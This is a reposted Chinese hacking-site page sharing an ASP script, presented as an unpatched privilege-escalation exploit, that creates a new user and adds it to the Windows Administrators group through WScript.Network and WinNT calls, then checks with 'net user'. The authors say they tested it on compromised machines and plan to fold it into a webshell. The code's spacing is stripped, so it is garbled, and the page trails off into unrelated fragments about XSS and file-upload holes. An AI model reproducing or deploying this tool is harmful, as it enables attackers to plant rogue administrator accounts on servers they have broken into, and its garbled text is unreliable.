时间:2021-05-18
添加超级用户的.asp代码[蓝屏的原创,凯文改进,Ms未公布的漏洞]
作者:蓝屏,凯文文章来源:冰点极限
其实上个礼拜我和凯文就在我的肉鸡上测试了,还有河马史诗.结果是在user权限下成功添加Administrators组的用户了(虽然我不敢相信我的眼睛).
上次凯文不发话,我不敢发布啊....现在在他的blog上看到他发布了,就转来了咯(比我上次测试时还改进了一点,加了个表单).这下大家有福咯```
反正代码是对的,但是很少能成功,具体的看运气了。。呵呵,下一步我想把他整合到海洋里面去。嘿嘿。
复制代码 代码如下:
<head>.network对象脚本权限提升漏洞利用工具</head>
<formaction="useradd.asp"method=post>
用户:<inputname="username"type="text"value="kevin1986"><br>
密码:<inputname="passwd"type="password"><br>
<inputtype="submit"Value="添加">
</form>
<%@codepage=936
onerrorresumenext
ifrequest.servervariables("REMOTE_ADDR")<>"127.0.0.1"then
response.write"iP!sn0TRiGHt"
else
ifrequest("username")<>""then
username=request("username")
passwd=request("passwd")
Response.Expires=0
Session.TimeOut=50
Server.ScriptTimeout=3000
setlp=Server.createObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Setob=GetObject(oz)
Setoe=GetObject(oz&"/Administrators,group")
Setod=ob.create("user",username)
od.SetPasswordpasswd
od.SetInfo
oe.Addoz&"/"&username
iferrthen
response.write"哎~~今天你还是别买6+1了……省下2元钱买瓶可乐也好……"
else
ifinstr(server.createobject("Wscript.shell").exec("cmd.exe/cnetuser"&username.stdout.readall),"上次登录")>0then
response.write"虽然没有错误,但是好象也没建立成功.你一定很郁闷吧"
else
Response.write"OMG!"&username&"帐号居然成了!这可是未知漏洞啊.5,000,000RMB是你的了"
endif
endif
else
response.write"请输入输入用户名"
endif
endif
%>
声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。
ASP代码一般是明文,很少有加密的,MS有个工具ScriptEncoder可以加密,这个东东可以微软官方网站免费下载,而且还有详细使用说明,但是经过它加密后的文
影响版本:EimsCmsv5.0 官方网站:http:/// 漏洞类型:跨站XSS 漏洞描述:未对Book.asp邮箱等处进行符号转义,导致XSS跨站
在Win10系统蓝屏之后会生成DMP蓝屏文件让用户或是管理员查看蓝屏原因,但是一些用户发现自己的电脑蓝屏之后C:\Windows\minidump文伯夹下根本没
会员上传文件漏洞,可以上传任意后缀user/swfupload.asp文件漏洞复制代码代码如下:IfUpFileObj.Form("NoReName")="1"
清明节在家充电,看到《失控》的作者凯文凯利写的一篇文章,《不要在颠覆逗留:成功之后,回退》。文章中提到,想要最大的创新,先扩大边缘范围。凯文凯利认为,互联网是一